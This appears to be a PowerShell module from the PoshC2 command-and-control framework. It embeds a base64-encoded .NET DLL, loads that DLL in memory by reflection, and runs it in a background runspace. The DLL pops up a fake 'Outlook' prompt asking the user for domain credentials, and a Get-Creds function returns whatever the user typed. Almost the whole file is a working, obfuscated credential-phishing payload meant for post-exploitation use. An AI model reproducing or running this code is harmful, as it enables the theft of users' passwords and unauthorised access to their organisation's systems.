PoshC2_Python/Modules/Cred-Popper.ps1

34 lines
9.7 KiB
PowerShell

function Cred-Popper($title="Outlook", $caption="Please Enter Your Domain Credentials", $minlengthpassword=1) {
$scriptblock = @"
`$PS = "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X0ZMQUdTAEdFTkVSSUNfQ1JFREVOVElBTFMAVVNFUk5BTUVfVEFSR0VUX0NSRURFTlRJQUxTAEVSUk9SX0JBRF9BUkdVTUVOVFMARE9fTk9UX1BFUlNJU1QAQ3JlZFVJUHJvbXB0Rm9yQ3JlZGVudGlhbHNXAFNIT1dfU0FWRV9DSEVDS19CT1gAdmFsdWVfXwBtc2NvcmxpYgBBcHBlbmQAbWF4UGFzc3dvcmQAbWlubGVuZ3RocGFzc3dvcmQAdGl0bGUAZ2V0X1VzZXJEb21haW5OYW1lAGdldF9Vc2VyTmFtZQBtYXhVc2VyTmFtZQB1c2VyTmFtZQB0YXJnZXROYW1lAFZhbHVlVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHBmU2F2ZQBzYXZlAGNiU2l6ZQBTaXplT2YAVG9TdHJpbmcAZ2V0X0xlbmd0aABjcmVkdWkATWFyc2hhbABkbGxtYWluLmRsbABDcmVkLVBvcHBlci5kbGwAU2VjdXJlWmVyb01lbQBTeXN0ZW0ARW51bQBTeXN0ZW0uUmVmbGVjdGlvbgBjYXB0aW9uAFplcm8AU3RyaW5nQnVpbGRlcgBoYm1CYW5uZXIAQ3JlZC1Qb3BwZXIAQ3JlZFBvcHBlcgBpRXJyb3IAbmV0RXJyb3IALmN0b3IASW50UHRyAHB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3Rl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"
`$DllBytes = [System.Convert]::FromBase64String(`$PS)
`$Assembly = [System.Reflection.Assembly]::Load(`$DllBytes)
`$sessionstate.log = [CredentialsPrompt]::CredPopper("$title", "$caption",$minlengthpassword)
"@
$global:sessionstate = [HashTable]::Synchronized(@{})
$sessionstate.log = New-Object System.Collections.ArrayList
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
$HTTP_runspace.Open()
$HTTP_runspace.SessionStateProxy.SetVariable('sessionstate',$sessionstate)
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($scriptblock) > $null
$HTTP_powershell.BeginInvoke() > $null
echo ""
echo "[+] Cred-Popper started in background runspace"
echo ""
echo "Run Get-Creds to obtain the output, when the user enters their credentials"
echo ""
}
function Get-Creds {
echo ""
"[+] Cred-Popper data:"
echo $sessionstate.log
}